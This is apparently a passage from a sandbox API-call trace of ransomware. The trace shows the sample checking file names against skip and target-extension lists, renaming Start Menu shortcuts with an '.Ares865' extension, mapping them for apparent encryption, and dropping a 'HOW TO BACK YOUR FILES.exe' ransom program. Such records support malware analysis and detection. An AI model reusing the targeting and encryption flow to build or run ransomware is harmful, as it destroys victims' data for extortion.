lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2=".") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="..") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="windows") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="bootmgr") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="temp") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="pagefile.sys") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="boot") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="ids.txt") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="ntuser.dat") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="perflogs") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="MSBuild") returned 1 [0068.437] lstrlenW (lpString="Windows PowerShell (x86).lnk") returned 28 [0068.437] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini") returned 81 [0068.437] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Windows PowerShell (x86).lnk" | out: lpString1="Windows PowerShell (x86).lnk") returned="Windows PowerShell (x86).lnk" [0068.437] lstrlenW (lpString="Windows PowerShell (x86).lnk") returned 28 [0068.437] lstrlenW (lpString="Ares865") returned 7 [0068.437] lstrcmpiW (lpString1="86).lnk", lpString2="Ares865") returned -1 [0068.437] lstrlenW (lpString=".dll") returned 4 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2=".dll") returned 1 [0068.438] lstrlenW (lpString=".lnk") returned 4 [0068.438] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2=".lnk") returned 1 [0068.438] lstrlenW (lpString=".ini") returned 4 [0068.438] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2=".ini") returned 1 [0068.438] lstrlenW (lpString=".sys") returned 4 [0068.438] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2=".sys") returned 1 [0068.438] lstrlenW (lpString="Windows PowerShell (x86).lnk") returned 28 [0068.438] lstrlenW (lpString="bak") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0068.438] lstrlenW (lpString="ba_") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0068.438] lstrlenW (lpString="dbb") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0068.438] lstrlenW (lpString="vmdk") returned 4 [0068.438] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0068.438] lstrlenW (lpString="rar") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0068.438] lstrlenW (lpString="zip") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0068.438] lstrlenW (lpString="tgz") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0068.438] lstrlenW (lpString="vbox") returned 4 [0068.438] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0068.438] lstrlenW (lpString="vdi") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0068.438] lstrlenW (lpString="vhd") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0068.438] lstrlenW (lpString="vhdx") returned 4 [0068.438] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0068.438] lstrlenW (lpString="avhd") returned 4 [0068.438] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0068.438] lstrlenW (lpString="db") returned 2 [0068.438] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0068.438] lstrlenW (lpString="db2") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0068.438] lstrlenW (lpString="db3") returned 3 [0068.438] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0068.438] lstrlenW (lpString="dbf") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0068.439] lstrlenW (lpString="mdf") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0068.439] lstrlenW (lpString="mdb") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0068.439] lstrlenW (lpString="sql") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0068.439] lstrlenW (lpString="sqlite") returned 6 [0068.439] lstrcmpiW (lpString1="6).lnk", lpString2="sqlite") returned -1 [0068.439] lstrlenW (lpString="sqlite3") returned 7 [0068.439] lstrcmpiW (lpString1="86).lnk", lpString2="sqlite3") returned -1 [0068.439] lstrlenW (lpString="sqlitedb") returned 8 [0068.439] lstrcmpiW (lpString1="x86).lnk", lpString2="sqlitedb") returned 1 [0068.439] lstrlenW (lpString="xml") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0068.439] lstrlenW (lpString="$er") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0068.439] lstrlenW (lpString="4dd") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0068.439] lstrlenW (lpString="4dl") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0068.439] lstrlenW (lpString="^^^") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0068.439] lstrlenW (lpString="abs") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0068.439] lstrlenW (lpString="abx") returned 3 [0068.439] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0068.439] lstrlenW (lpString="accdb") returned 5 [0068.439] lstrcmpiW (lpString1=").lnk", lpString2="accdb") returned -1 [0068.439] lstrlenW (lpString="accdc") returned 5 [0068.439] lstrcmpiW (lpString1=").lnk", lpString2="accdc") returned -1 [0068.439] lstrlenW (lpString="accde") returned 5 [0068.439] lstrcmpiW (lpString1=").lnk", lpString2="accde") returned -1 [0068.439] lstrlenW (lpString="accdr") returned 5 [0068.439] lstrcmpiW (lpString1=").lnk", lpString2="accdr") returned -1 [0068.439] lstrlenW (lpString="accdt") returned 5 [0068.439] lstrcmpiW (lpString1=").lnk", lpString2="accdt") returned -1 [0068.439] lstrlenW (lpString="accdw") returned 5 [0068.440] lstrcmpiW (lpString1=").lnk", lpString2="accdw") returned -1 [0068.440] lstrlenW (lpString="accft") returned 5 [0068.440] lstrcmpiW (lpString1=").lnk", lpString2="accft") returned -1 [0068.440] lstrlenW (lpString="adb") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.440] lstrlenW (lpString="adb") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.440] lstrlenW (lpString="ade") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0068.440] lstrlenW (lpString="adf") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0068.440] lstrlenW (lpString="adn") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0068.440] lstrlenW (lpString="adp") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0068.440] lstrlenW (lpString="alf") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0068.440] lstrlenW (lpString="ask") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0068.440] lstrlenW (lpString="btr") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0068.440] lstrlenW (lpString="cat") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0068.440] lstrlenW (lpString="cdb") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0068.440] lstrlenW (lpString="ckp") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0068.440] lstrlenW (lpString="cma") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0068.440] lstrlenW (lpString="cpd") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0068.440] lstrlenW (lpString="dacpac") returned 6 [0068.440] lstrcmpiW (lpString1="6).lnk", lpString2="dacpac") returned -1 [0068.440] lstrlenW (lpString="dad") returned 3 [0068.440] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0068.440] lstrlenW (lpString="dadiagrams") returned 10 [0068.440] lstrcmpiW (lpString1=" (x86).lnk", lpString2="dadiagrams") returned -1 [0068.440] lstrlenW (lpString="daschema") returned 8 [0068.441] lstrcmpiW (lpString1="x86).lnk", lpString2="daschema") returned 1 [0068.441] lstrlenW (lpString="db-journal") returned 10 [0068.441] lstrcmpiW (lpString1=" (x86).lnk", lpString2="db-journal") returned -1 [0068.441] lstrlenW (lpString="db-shm") returned 6 [0068.441] lstrcmpiW (lpString1="6).lnk", lpString2="db-shm") returned -1 [0068.441] lstrlenW (lpString="db-wal") returned 6 [0068.441] lstrcmpiW (lpString1="6).lnk", lpString2="db-wal") returned -1 [0068.441] lstrlenW (lpString="dbc") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0068.441] lstrlenW (lpString="dbs") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0068.441] lstrlenW (lpString="dbt") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0068.441] lstrlenW (lpString="dbv") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0068.441] lstrlenW (lpString="dbx") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0068.441] lstrlenW (lpString="dcb") returned 3 [0068.441] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0068.441] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.Ares865") returned 106 [0068.441] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk.ares865"), dwFlags=0x1) returned 1 [0068.442] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.442] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1989) returned 1 [0068.443] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.443] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.443] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0068.443] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.444] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.444] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.444] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xad0, lpName=0x0) returned 0x120 [0068.453] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad0) returned 0x420000 [0068.454] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.454] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.454] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.455] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0068.455] CloseHandle (hObject=0x120) returned 1 [0068.455] CloseHandle (hObject=0x154) returned 1 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0068.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.457] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d79c9d7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8d79c9d7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8d7c2b37, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x5bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows PowerShell ISE (x86).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="aoldtz.exe") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2=".") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="..") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="windows") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="bootmgr") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="temp") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="pagefile.sys") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="boot") returned 1 [0068.457] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="ids.txt") returned 1 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="ntuser.dat") returned 1 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="perflogs") returned 1 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2="MSBuild") returned 1 [0068.458] lstrlenW (lpString="Windows PowerShell ISE (x86).lnk") returned 32 [0068.458] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk") returned 98 [0068.458] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Windows PowerShell ISE (x86).lnk" | out: lpString1="Windows PowerShell ISE (x86).lnk") returned="Windows PowerShell ISE (x86).lnk" [0068.458] lstrlenW (lpString="Windows PowerShell ISE (x86).lnk") returned 32 [0068.458] lstrlenW (lpString="Ares865") returned 7 [0068.458] lstrcmpiW (lpString1="86).lnk", lpString2="Ares865") returned -1 [0068.458] lstrlenW (lpString=".dll") returned 4 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2=".dll") returned 1 [0068.458] lstrlenW (lpString=".lnk") returned 4 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2=".lnk") returned 1 [0068.458] lstrlenW (lpString=".ini") returned 4 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2=".ini") returned 1 [0068.458] lstrlenW (lpString=".sys") returned 4 [0068.458] lstrcmpiW (lpString1="Windows PowerShell ISE (x86).lnk", lpString2=".sys") returned 1 [0068.458] lstrlenW (lpString="Windows PowerShell ISE (x86).lnk") returned 32 [0068.458] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.Ares865") returned 110 [0068.458] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk.ares865"), dwFlags=0x1) returned 1 [0068.460] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.460] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1468) returned 1 [0068.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0068.460] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.461] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.461] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.461] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8c0, lpName=0x0) returned 0x120 [0068.462] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c0) returned 0x420000 [0068.463] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.464] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.464] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.465] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.Ares865") returned 104 [0068.465] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk.ares865"), dwFlags=0x1) returned 1 [0068.466] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.466] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1468) returned 1 [0068.466] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.467] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.467] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.467] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8c0, lpName=0x0) returned 0x120 [0068.469] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c0) returned 0x420000 [0068.470] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.470] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.470] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.Ares865") returned 100 [0068.471] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk.ares865"), dwFlags=0x1) returned 1 [0068.472] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.473] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1899) returned 1 [0068.473] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.473] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.474] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.474] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa70, lpName=0x0) returned 0x120 [0068.475] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa70) returned 0x420000 [0068.476] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.477] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.477] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.477] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC" [0068.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0068.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0068.477] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC") returned 60 [0068.477] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC" [0068.477] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.477] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.478] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.478] GetLastError () returned 0x0 [0068.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.Ares865") returned 80 [0068.478] 